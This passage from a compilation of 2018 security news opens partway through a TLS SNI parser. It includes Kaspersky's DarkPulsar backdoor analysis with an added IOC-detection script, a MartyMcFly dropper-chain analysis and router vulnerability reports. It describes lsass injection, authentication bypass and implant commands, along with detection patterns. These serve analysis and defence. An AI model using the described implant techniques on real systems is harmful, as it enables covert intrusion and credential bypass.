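        raise ValueError("not a ClientHello handshake message")
    body_len = int.from_bytes(client_hello[1:4], "big")
    body = client_hello[4:4 + body_len]
    if len(body) != body_len:
        raise ValueError("truncated ClientHello")
    pos = 2 + 32                                          # legacy_version + random
    pos += 1 + body[pos]                                  # legacy_session_id
    pos += 2 + struct.unpack_from("!H", body, pos)[0]     # cipher_suites
    pos += 1 + body[pos]                                  # legacy_compression_methods
    if pos + 2 > len(body):
        return {}                                         # no extensions block at all
    ext_len = struct.unpack_from("!H", body, pos)[0]
    pos += 2
    end = pos + ext_len
    if end > len(body):
        raise ValueError("extensions block overruns the message")
    exts = {}
    while pos + 4 <= end:
        ext_type, length = struct.unpack_from("!HH", body, pos)
        pos += 4
        if pos + length > end:
            raise ValueError("extension overruns the extensions block")
        exts[ext_type] = body[pos:pos + length]
        pos += length
    return exts


def extract_sni(client_hello):
    """Return the host name a network observer can read in the clear, or None."""
    data = parse_extensions(client_hello).get(EXT_SERVER_NAME)
    if data is None:
        return None
    list_len = struct.unpack_from("!H", data, 0)[0]
    pos, end = 2, 2 + list_len
    while pos + 3 <= end:
        name_type = data[pos]
        name_len = struct.unpack_from("!H", data, pos + 1)[0]
        name = data[pos + 3:pos + 3 + name_len]
        pos += 3 + name_len
        if name_type == 0:                                # host_name
            return name.decode("ascii")
    return None


def sni_exposure(client_hello):
    """Classify what the ClientHello reveals about the destination site."""
    exts = parse_extensions(client_hello)
    if EXT_SERVER_NAME in exts:
        return "plaintext: " + (extract_sni(client_hello) or "<empty server_name>")
    if EXT_ENCRYPTED_SERVER_NAME in exts:
        return "encrypted: %d opaque bytes" % len(exts[EXT_ENCRYPTED_SERVER_NAME])
    return "none"


if __name__ == "__main__":
    print(sni_exposure(build_client_hello(sni_extension("example.com"))))
    print(sni_exposure(build_client_hello(esni_extension(b"\xa5" * 40))))
```

The same parser run over captured ClientHellos is a simple way to measure how much of a network's outbound TLS still exposes host names once clients and CDNs start enabling ESNI.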


EU Leaders Vow Tough Action on Cyber Attacks
21.10.2018 securityweek 
BigBrothers

EU leaders on Thursday condemned the attempted hack on the global chemical weapons watchdog and vowed to step up the bloc's efforts to tackle cyber attacks.

With concerns growing about the malign cyber activities of several countries around the world, notably Russia, the bloc's leaders called for work to begin to set up sanctions to punish hackers.

The decision at an EU summit in Brussels comes after eight countries led by Britain pushed for urgent moves to hit hackers, warning that a lack of action was giving the impression that cyber attacks would go unpunished.

"Work on the capacity to respond to and deter cyber attacks through EU restrictive measures should be taken forward," the 28 leaders said in their summit communique.

The statement condemned the bid, revealed this month, by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

"Such threats and attacks strengthen our common resolve to further enhance the EU's internal security and our ability and capabilities to detect, prevent, disrupt and respond to hostile activities of foreign intelligence networks," the summit statement said.

A proposal backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands earlier this week called for a sanctions regime to be set up to punish cyber attackers.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But efforts to crack down on cyber attackers may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.


FreeRTOS Vulnerabilities Expose Many Systems to Attacks
21.10.2018 securityweek
Vulnerability

Vulnerabilities discovered in the FreeRTOS operating system can expose a wide range of systems to attacks, including smart home devices and critical infrastructure, researchers warn.

FreeRTOS is an open source operating system designed specifically for microcontrollers. The OS has many use cases, including industrial applications (sensors, actuators, pumps), B2B solutions (security equipment, door locks), and consumer products (home appliances, wearable technology). Amazon, which took over the FreeRTOS project in 2017, has added cloud connectivity capabilities.

The commercial version of the operating system is called OpenRTOS and it’s maintained by WITTENSTEIN high integrity systems (WHIS), which also develops the safety-focused version SafeRTOS.

Researchers from Zimperium’s zLabs have analyzed FreeRTOS’s TCP/IP stack and AWS secure connectivity modules, and discovered more than a dozen vulnerabilities that also impact OpenRTOS and SafeRTOS.

Both Amazon and WHIS have developed patches for the flaws discovered by zLabs. Amazon addressed the issues with the release of FreeRTOS 1.3.2.

Since it’s an open source project, the mobile cybersecurity firm has decided not to disclose any vulnerability details for another 30 days to allow vendors to deploy the patches.

The company did, however, share some limited information about each of the flaws it discovered. The list includes four remote code execution, one denial-of-service (DoS), and seven information leakage issues.

“These vulnerabilities allow an attacker to crash the device, leak information from the device’s memory, and remotely execute code on it, thus completely compromising it,” zLabs said in a blog post.

Since FreeRTOS is used by a wide range of systems, the vulnerabilities found by Zimperium researchers can be highly useful to malicious actors, including cybercriminals trying to build botnets powered by home devices, and sophisticated threat actors looking to target critical infrastructure.


Server With National Guard Personnel Data Target of Attack
21.10.2018 securityweek 
Attack

The Indiana National Guard says a state, non-military computer server containing personal information on civilian and military Guard personnel was the target of a recent ransomware attack.

The Guard said Thursday it is notifying the affected personnel that they should be alert for suspicious activity or fraudulent accounts being opened in their name.

It says the type of ransomware attack targets the server by denying access to the rightful owners but usually does not compromise the contents of the server. It says it has no reason to believe it was a targeted attack against the Indiana National Guard.

The Guard says it's taking steps to prevent future such attacks.


DarkPulsar
20.10.2018 Kaspersky
APT

In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical Windows interface similar to botnet administrative panels, as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for victims not controlled through FuzzBunch.

DanderSpritz interface

Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:

%pluginName%-version.fb
This is the utility file of the framework. It duplicates the header from XML and includes the plugin’s ID.

%pluginName%-version.exe
This executable file is launched when FuZZbuNch receives the command to do so.

%pluginName%-version.xml
This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.

One of the most interesting FuzzBunch categories is called ImplantConfig and includes plugins designed to control infected machines via an implant at the post-exploitation stage. DarkPulsar belongs to this category: it is the administrative module for a passive backdoor named ‘sipauth32.tsp’ that provides remote control.

It supports the following commands:

Burn
RawShellcode
EDFStagedUpload
DisableSecurity
EnableSecurity
UpgradeImplant
PingPong
Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.

While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant:

We thought that these constants would probably also appear in the backdoor, so we created a detection for them. Several months later we found our mysterious DarkPulsar backdoor, and we were later able to find both 32- and 64-bit versions.

We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

DarkPulsar technical highlights
The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:

Two nameless functions used to install the backdoor in the system.
Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.
The implementations of the SSPI and TSPI interfaces are minimalistic: the functions that are exported by DarkPulsar have the same names as the interface functions; however, they include malicious code instead of the phone service.

The implant is installed in the system by a nameless exported function. The backdoor is launched by calling Secur32.AddSecurityPackage with administrator privileges and the path to its own library as the parameter, causing lsass.exe to load DarkPulsar as an SSP/AP and to call its exported function SpLsaModeInitialize, which DarkPulsar uses to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. The installer also adds its library name under HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers.

That library is loaded at startup by the Telephony API service (TapiSrv), which is launched alongside the Remote Access Connection Manager (RasMan) service; the installer sets the startup type to “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion, which contains the AddSecurityPackage call that performs the injection into lsass.exe.

DarkPulsar implements its payload by installing hooks on SpAcceptLsaModeContext, the function responsible for authentication. These hooks are placed in several system authentication packages inside the lsass.exe process and allow DarkPulsar to control the authentication process for the following protocols:

Msv1_0.dll – for the NTLM protocol,
Kerberos.dll – for the Kerberos protocol,
Schannel.dll – for the TLS/SSL protocols,
Wdigest.dll – for the Digest protocol, and
Lsasrv.dll – for the Negotiate protocol.
After this, DarkPulsar is able to embed its traffic into system protocols. Because this network activity follows the standard system paths, it is only reflected in the System process: the backdoor uses the system ports reserved for the above protocols without hindering their normal operation.

Network traffic during successful connection to DarkPulsar implant

The second advantage of controlling the authentication process is the ability to bypass entering a valid username and password when accessing objects that require authentication, such as the process list, the remote registry and the file system over SMB. After DarkPulsar’s DisableSecurity command is sent, the backdoor’s hooks on the victim side make SpAcceptLsaModeContext always report that the supplied credentials are valid, so the system grants the client access to the protected objects.

Working with DarkPulsar
Darkpulsar-1.1.0.exe is the administrative interface working under the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar-1.1.0.9.xml or as command line arguments, detailing at least:

whether the target machine uses a 32-bit or 64-bit system;
protocol (SMB, NBT, SSL and RDP are supported) to deliver the command, and the port number;
the private RSA key to decrypt the session AES key.
Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines. It is a plugin of the FuzzBunch framework, which manages parameters and coordinates the different components. Here is how the DisableSecurity command looks in FuzzBunch:

Below is an example of Processlist after DisableSecurity, which allows any plugin to be executed without valid credentials while operating through regular system functions (here the remote registry service):

DanderSpritz
DanderSpritz is the framework for controlling infected machines, different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.

DanderSpritz works with a larger range of backdoors, using PeddleCheap on the victim to let operators launch plugins. PeddleCheap is a DanderSpritz plugin that can be used to configure implants and connect to infected machines. Once a connection is established, all DanderSpritz post-exploitation features become available.

This is how DarkPulsar in EDFStagedUpload mode provides the opportunity to infect the victim with a more functional implant: PCDllLauncher (Fuzzbunch’s plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence, the full name of PCDllLauncher is ‘PeddleCheap DLL Launcher’.

The complete DanderSpritz usage scheme with the plugin PeddleCheap via FuZZbuNch with the plugins DarkPulsar and PCDllLauncher consists of four steps:

Via FuZZbuNch, run command EDFStagedUpload to launch DarkPulsar.
In DanderSpritz, run command pc_prep (PeddleCheap Preparation) to prepare the payload and the library to be launched on the implant side.
In DanderSpritz, run command pc_old (which is the alias of command pc_listen -reuse -nolisten -key Default) – this sets it to wait for a socket from Pcdlllauncher.
Launch Pcdlllauncher via FuZZbuNch and specify the path to the payload that has been prepared with the command pc_prep in the ImplantFilename parameter.

DanderSpritz

File System plugin

Conclusions
The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.

The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness. The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.

Our products can completely remove the malware related to this attack.

Detecting malicious network activity
When EDFStagedUpload is executed in an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:

When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:

When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:

IOCs
implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
File path – %SystemRoot%\System32\sipauth32.tsp
Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers
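The persistence artefacts described in the technical section (the Telephony Providers registry entry and the sipauth32.tsp library), the network artefacts of the previous section (bound sockets owned by lsass.exe) and the IOCs above can be checked from collected host output. This is an added example, not Kaspersky's tooling: it parses constructed reg query and netstat -ano text, the baseline TSP list and the domain-controller port list are assumptions to tune per environment, and only the hash, file name and registry key come from the report.

```python
import hashlib
import re

# Indicators published in the report; everything else in this example is constructed.
IOC_IMPLANT_MD5 = "96f10cfa6ba24c9ecd08aa6d37993fe4"
IOC_TSP_NAME = "sipauth32.tsp"
IOC_REG_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers"

# Telephony service providers normally registered on Windows (assumption: build this
# baseline from a known-clean host of the same build instead of trusting the list).
BASELINE_TSPS = {"unimdm.tsp", "kmddsp.tsp", "ndptsp.tsp", "hidphone.tsp",
                 "h323.tsp", "ipconf.tsp", "remotesp.tsp"}

# Ports lsass.exe legitimately owns on a domain controller (Kerberos, kpasswd, LDAP, GC).
DC_LSASS_PORTS = {88, 389, 464, 636, 3268, 3269}

_REG_SZ = re.compile(r"^\s*(\S+)\s+REG_SZ\s+(.+?)\s*$")
_NETSTAT = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def suspicious_tsp_providers(reg_query_output):
    """Parse 'reg query' output for the Providers key and return (value name, file name,
    reason) for each TSP that is the DarkPulsar IOC or is missing from the baseline."""
    findings = []
    for line in reg_query_output.splitlines():
        m = _REG_SZ.match(line)
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        tsp = value.rsplit("\\", 1)[-1].lower()      # strip any directory prefix
        if not tsp.endswith(".tsp"):
            continue
        if tsp == IOC_TSP_NAME:
            findings.append((name, value, "matches DarkPulsar IOC"))
        elif tsp not in BASELINE_TSPS:
            findings.append((name, value, "TSP not in baseline"))
    return findings


def lsass_socket_findings(netstat_output, pid_to_name, is_domain_controller=False):
    """Parse 'netstat -ano' output and return sockets owned by lsass.exe that are not
    explained by a domain-controller role; on a member server lsass.exe owning
    sockets is the artefact the report describes."""
    findings = []
    for line in netstat_output.splitlines():
        m = _NETSTAT.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        if pid_to_name.get(int(pid), "").lower() != "lsass.exe":
            continue
        port = int(local.rsplit(":", 1)[1])
        if is_domain_controller and port in DC_LSASS_PORTS:
            continue
        findings.append((proto, local, foreign, state or "-"))
    return findings


def implant_hash_matches(file_bytes):
    """Compare a copy of %SystemRoot%\\System32\\sipauth32.tsp with the published hash."""
    return hashlib.md5(file_bytes).hexdigest() == IOC_IMPLANT_MD5


# Constructed sample data, not captured from a real host.
SAMPLE_REG_QUERY = IOC_REG_KEY + """
    NumProviders         REG_DWORD    0x3
    ProviderID0          REG_DWORD    0x1
    ProviderFileName0    REG_SZ       unimdm.tsp
    ProviderID1          REG_DWORD    0x2
    ProviderFileName1    REG_SZ       kmddsp.tsp
    ProviderID2          REG_DWORD    0x3
    ProviderFileName2    REG_SZ       sipauth32.tsp
"""
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       612
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.0.0.5:445           10.0.0.9:51034         ESTABLISHED     4
  TCP    10.0.0.5:49158         0.0.0.0:0              LISTENING       612
  TCP    10.0.0.5:49159         10.0.0.9:51035         ESTABLISHED     612
  UDP    0.0.0.0:500            *:*                                    720
"""
SAMPLE_PIDS = {4: "System", 612: "lsass.exe", 720: "svchost.exe"}


def triage(reg_query_output=SAMPLE_REG_QUERY, netstat_output=SAMPLE_NETSTAT,
           pid_to_name=SAMPLE_PIDS, is_domain_controller=False):
    """Run both host checks and return a summary a responder can act on."""
    return {"tsp_findings": suspicious_tsp_providers(reg_query_output),
            "lsass_sockets": lsass_socket_findings(netstat_output, pid_to_name,
                                                   is_domain_controller)}


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

Port 445 traffic itself stays attributed to the System process, as the report notes, so the socket check keys on the process owner rather than the port.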


DarkPulsar FAQ
20.10.2018 Kaspersky 
APT
What’s it all about?
In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The Fuzzbunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. In combination, they form a very powerful platform for cyber-espionage.

How was this implant discovered?
We always analyze all leaks containing malicious software to provide the best detection. The same happened after the “Lost in Translation” leak was revealed. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only. We also noticed some magic constants in this administrative module, and having created some special signatures based on them, were able to catch the implant itself.

What exactly can this implant be used for?
This implant supports 7 commands:

The most interesting are DisableSecurity and EnableSecurity.

Burn – for self-deletion.
RawShellcode – to execute arbitrary base-independent code.
EDFStagedUpload – Exploit Development Framework Staged Upload. Step by step, it deploys DanderSpritz payloads into the victim’s memory without touching the drive. After this command is executed, the administrator can send any of the many DanderSpritz commands to the victim. (View details in the technical part of this report)
DisableSecurity – for disabling NTLM protocol security. With the help of this command, the malware administrator does not need to know a valid victim username and password to pass authentication – the system will interpret any arbitrary pair as valid. (View details in the technical part of this report)
EnableSecurity – the opposite of DisableSecurity.
UpgradeImplant – for installing a new version of the backdoor.
PingPong – for test communication.
How many victims?
We found around 50 victims, but believe that the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time. The second point proving this suggestion is that after stopping their cyber-espionage campaign, the malware owners often delete their malware from victim computers, so the 50 victims are very probably just ones that the attackers have simply forgotten.

Which countries?
All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected. Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D.

What about the attack duration? Does it last long?
DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.

Is the attack still active?
We think that after the “Lost In Translation” leak the espionage campaign was stopped, but that doesn’t mean that all computers are rid of this backdoor infection. We cured all our users. For users without our protection, we have several tips on how to check whether your system is infected and how to cure it yourself. Note that to use this backdoor on infected victims, the attackers need to know the private RSA key that pairs with the public key embedded in the backdoor. This means that no one except DarkPulsar’s real operators can exploit compromised systems.

How to protect against this threat?
We can detect this threat with different technologies.

However, the standard recommendations remain the same:

Keep your security products up to date
Do not turn security product components off
Keep your OS updated
Install all security patches asap
Use special traffic analysis tools and pay attention to all encrypted traffic
Do not use weak passwords or the same password for several endpoints
Use complex passwords
Do not allow remote connections to endpoints with administration rights
Do not allow domain administrators to be local administrators with the same credentials
Which proactive technologies do you have to protect users against such threats?
We use machine learning, cloud technologies, emulation, and behavioral analysis in combination with anti-exploit protection to provide the best proactive protection for our clients.

Who is behind this threat?
We never engage in attribution. Our purpose is to counteract all threats, regardless of their source or destination.

How was this implant used? Was it created for stealing money or just information?
We have not seen any techniques for stealing money in this implant, but it is worth keeping in mind that this implant can run any executable code, so its functionality can be increased significantly.


Splunk addressed several vulnerabilities in Enterprise and Light products
20.10.2018 securityweek
Vulnerability

Splunk recently addressed several vulnerabilities in its Enterprise and Light products, some of which have been rated “high severity.”
Splunk Enterprise solution allows organizations to aggregate, search, analyze, and visualize data from various sources that are critical to business operations.

Splunk Light is a comprehensive solution for small IT environments that automates log analysis and integrates server and network monitoring.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” reads the advisory published by Splunk.

The most severe issue fixed by the company is a high severity cross-site scripting (XSS) flaw in the Web interface, tracked as CVE-2018-7427, that received the CVSS score of 8.1.

Another vulnerability is a DoS flaw tracked as CVE-2018-7432 that could be exploited using malicious HTTP requests sent to Splunkd, the system process that handles indexing, searching and forwarding. The company rated this issue “medium severity.”

The company also addressed a denial-of-service (DoS) vulnerability, tracked as CVE-2018-7429, that could be exploited by an attacker by sending a specially crafted HTTP request to Splunkd.

The last flaw addressed by the vendor, tracked as CVE-2018-7431, is a path traversal issue that allows an authenticated attacker to download arbitrary files from the Splunk Django app. The vulnerability has been rated “medium severity.”

The affected versions are listed below:

Cross Site Scripting in Splunk Web (CVE-2018-7427)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
Affected Components: All Splunk Enterprise components running Splunk Web.
Denial of Service (CVE-2018-7432)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and Splunk Light before 6.6.0
Affected Components: All Splunk Enterprise components running Splunk Web.
Path Traversal Vulnerability in Splunk Django App (CVE-2018-7431)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
Affected Components: All Splunk Enterprise components running Splunk Web.
Splunkd Denial of Service via Malformed HTTP Request (CVE-2018-7429)
Affected Product Versions: Splunk Enterprise versions 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14 and Splunk Light before 6.5.0
Affected Components: All Splunk Enterprise components running Splunk Web.
The vendor declared it has found no evidence that these vulnerabilities have been exploited in attacks in the wild.


MartyMcFly Malware: new Cyber-Espionage Campaign targeting Italian Naval Industry
20.10.2018 securityweek
CyberSpy  Virus

Yoroi security firm uncovered a targeted attack against one of the most important companies in the Italian Naval Industry leveraging MartyMcFly Malware.
Today I’d like to share an interesting analysis of a targeted attack found and dissected by Yoroi (technical details are available here). The victim was one of the most important leaders in the Italian security and defensive, military-grade naval ecosystem. Everything started from a well-crafted email targeting the right office and asking for naval engine spare part prices. The mail was quite clear and well written, with detailed spare parts matching the real engine parts. The analyzed email presented two attachments to the victim:
A company profile, aiming to present the company who was asking for spare parts
A Microsoft.XLSX where (apparently) the list of the needed spare parts was available
The attacker asked for a quotation of the entire spare part list in the spreadsheet, so the victim needed to open the included Microsoft spreadsheet to enumerate the “fake customer” needs. Opening the Excel file infects the victim.

Let’s go deep into that file and see what is happening there. At first sight, the Office document had encrypted content available in OleObj.1 and OleObj.2. Those objects are real encrypted OLE objects: the encrypted payload sits in the “EncryptedPackage” section and information on how to decrypt it is available in the “EncryptionInfo” XML descriptor. At that time, however, EncryptionInfo held the encryption algorithm and additional information regarding the payload, but no keys were provided. The question here was disruptive: how is Microsoft Excel able to decrypt such content if no password is requested from the end user? Put another way, if the victim opens the document and is not aware of the “secret key”, how can he/she get infected? And why would the attacker use an encrypted payload if the victim cannot open it?

Stage1: Encrypted Content
Using an encrypted payload is quite a common way to evade antivirus, since the encrypted payload changes depending on the key used. But what is the key?
Well, Microsoft Excel has a common way to open documents called “Read Only”. In “Read Only” mode the file can be opened even if it is encrypted: Microsoft Excel asks the user for a decryption key only if the user wants to save, print or modify the content. For that case, Microsoft programmers used a special, static key to decrypt “Read Only” documents. The key has the following value: “VelvetSweatshop” (a nice old article on that). Let’s try to use this “key” to decrypt the content! The following image shows a brand new stage where a valid extracted xlsx file wraps more objects; we define it as Stage2.

Stage2: OleOBj inclusion
A quick analysis of Stage2 exposes a new object inclusion (as shown in the picture Stage2: OleOBJ inclusion). That object was crafted on 2018-10-09 but was first seen only on 2018-10-12. At this point the extracted object is clear text and no encrypted content was found at all. The following image shows the extracted object from Stage2.

Stage2: extracted Payload

It’s not hard to see what the payload does (CVE-2017-11882), but if you run it on a dynamic engine you would probably have more chances to prove it. The payload exploits CVE-2017-11882 by spawning the Equation Editor, then dropping and executing an external PE file. We might define the Equation Editor dropping and executing as Stage3. The following image shows the connection to a dropping website performed by EquationEditor.

Stage3: Equation Editor Spawned and connecting to Dropping URL
Evidence of what was dissected is shown in the following image (Introducing Stage4), where the EquationEditor network trace is provided. We are introducing a new stage: Stage4. GEqy87.exe (Stage4) is a common Windows PE. It is placed inside an unconventional folder (js/jquery/file/… ) on a compromised, thematically related website. This placement usually has a double purpose: (a) bypassing old-school or unconfigured IDS and (b) hiding malicious software in a well-known and trusted folder structure in order to persist across website upgrades.

Introducing Stage4. PE file dropped and executed
Stage4 is pretty interesting per se. It’s a nice piece of software written in Borland Delphi 7. According to VirusTotal the software was “seen in the wild” in 2010 but submitted only on 2018-10-12! This is pretty interesting, isn’t it? Maybe a hash collision over multiple years? Maybe a buggy variable on VirusTotal? Or maybe not; maybe something more sophisticated and complex is happening out there.

Stage4: According to Virus Total
Looking into GEqy87, it is quite clear that the sample was hiding an additional Windows PE. On one hand, it builds up the new PE directly in memory by running decryption loops (not reversed here). On the other hand, it fires up 0xEIP to a pre-allocated memory section in order to reach the newly available code section.

Stage5: Windows PE hidden into GEqy87.exe
Stage5 deploys many evasion tricks such as GetLastInputIn, SleepX, and GetLocalTime to trick debuggers and sandboxes. It makes an explicit date check against 0x7E1 (2017). If the current date is less than or equal to 0x7E1 it ends up skipping the real behavior, while if the current date is, for example, 2018, it runs its behavior by calling “0xEAX” (typical control flow redirection on crafted memory).
For more technical details, please have a look here. What looks very interesting, at least from my personal point of view, is the following evidence:
Assuming there were no hash collisions over years
Assuming VirusTotal: “First Seen in The Wild” is right (and not bugged)
We might think that: “we are facing a new threat targeting (as today) Naval Industry planned in 2010 and run in 2018″.
The name MartyMcFly comes pretty naturally here, given the “interesting date-back from Virus Total”. I am not confident about that date, but I can only assume VirusTotal is right.

For IoC please visit the analysis from here.

Further details on the MartyMcFly malware are reported in the original analysis published by Marco Ramilli on his blog.

Yoroi also launched a new blog where it is possible to find several interesting analyses, including the one on the MartyMcFly malware.


Chaining three critical vulnerabilities allows takeover of D-Link routers
20.10.2018 securityweek
Vulnerability

Researchers from the Silesian University of Technology in Poland discovered several flaws that could be exploited to take over some D-Link routers.
A group of researchers from the Silesian University of Technology in Poland has discovered three vulnerabilities in some models of D-Link routers that could be chained to take full control over the devices.

The flaws are a Directory Traversal (CVE-2018-10822), Password stored in plaintext (CVE-2018-10824), and a Shell command injection (CVE-2018-10823).

“I have found multiple vulnerabilities in D-Link router httpd server. These vulnerabilities are present in multiple D-Link types of routers. All three taken together allow to take a full control over the router including code execution.” reads the security advisory.

The vulnerabilities reside in the httpd server of some D-Link routers, including DWR-116, DWR-111, DIR-140L, DIR-640L, DWR-512, DWR-712, DWR-912, and DWR-921.

Researchers found a directory traversal vulnerability, tracked as CVE-2018-10822, that could be exploited by remote attackers to read arbitrary files using an HTTP request.

The issue was initially reported to D-Link as CVE-2017-6190, but the vendor did not correctly fix the flaw.

This flaw could be exploited to gain access to a file that stores the admin password for the device in clear text.

The storage of the password in clear text is tracked as CVE-2018-10824; to avoid abuse, the experts did not reveal the path of the file.

Researchers also reported another flaw, tracked as CVE-2018-10823, that could be exploited by an authenticated attacker to execute arbitrary commands and take over the device.

Below is a video that shows how the flaws could be chained to take over a device:

The experts reported the flaws to D-Link in May, but the vendor still hasn’t addressed them, so the experts publicly disclosed the vulnerabilities.

Until a patch addressing the vulnerabilities is available, users can make their devices inaccessible from the Internet.


The author of the LuminosityLink RAT sentenced to 30 Months in Prison
20.10.2018 securityweek
Virus

The author of the infamous LuminosityLink RAT, Colton Grubbs (21), was sentenced to 30 months in federal prison.
Colton Grubbs, 21, of Stanford, Kentucky, the author of the infamous LuminosityLink RAT, was sentenced to 30 months in federal prison.

In February, the Europol’s European Cybercrime Centre (EC3) along with the UK National Crime Agency (NCA) disclosed the details of an international law enforcement operation that targeted the criminal ecosystem around the Luminosity RAT (aka LuminosityLink).

According to the EC3, the joint operation was conducted in September 2017; it involved more than a dozen law enforcement agencies from Europe, the US, and Australia.

The Luminosity RAT was first spotted in 2015 but it became very popular in 2016.

The malware was offered for sale in the criminal underground for as little as $40; it allows attackers to take complete control over the infected system.

The Luminosity RAT was one of the malicious codes used in Business Email Compromise attacks and was also used by Nigerian gangs in attacks aimed at industrial firms.

Luminosity RAT

In September 2016, UK law enforcement arrested Colton Grubbs, who admitted to designing, marketing, and selling LuminosityLink.

Grubbs offered the malware for sale for $39.99 to more than 6,000 customers; he also helped them to hack computers worldwide.

“Grubbs previously admitted to designing, marketing, and selling a software, called LuminosityLink, that Grubbs knew would be used by some customers to remotely access and control their victims’ computers without the victims’ knowledge or consent. Among other malicious features, LuminosityLink allowed Grubbs’ customers to record the keys that victims pressed on their keyboards, surveil victims using their computers’ cameras and microphones, view and download the computers’ files, and steal names and passwords used to access websites.” reads the DoJ’s statement.
“Directly and indirectly, Grubbs offered assistance to his customers on how to use LuminosityLink for unauthorized computer intrusions through posts and group chats on websites such as HackForums.net. “

Grubbs will serve 85% of his prison sentence, then he will be released under supervision of the United States Probation Office for a term of three years.

Grubbs must forfeit the proceeds of his crimes, including 114 Bitcoin that was seized by the Federal Bureau of Investigation.

“Our modern society is dependent on computers, mobile devices, and the use of the internet. It is essential that we vigorously prosecute those who erode that confidence and illicitly gain access to computer systems and the electronic information of others. Everyone benefits when this deceitful conduct is discovered, investigated, and prosecuted,” Robert M. Duncan, Jr., United States Attorney for the Eastern District of Kentucky, said.

The arrest triggered a new investigation that resulted in several arrests, search warrants, and cease and desist notifications across Europe, America, and Australia.

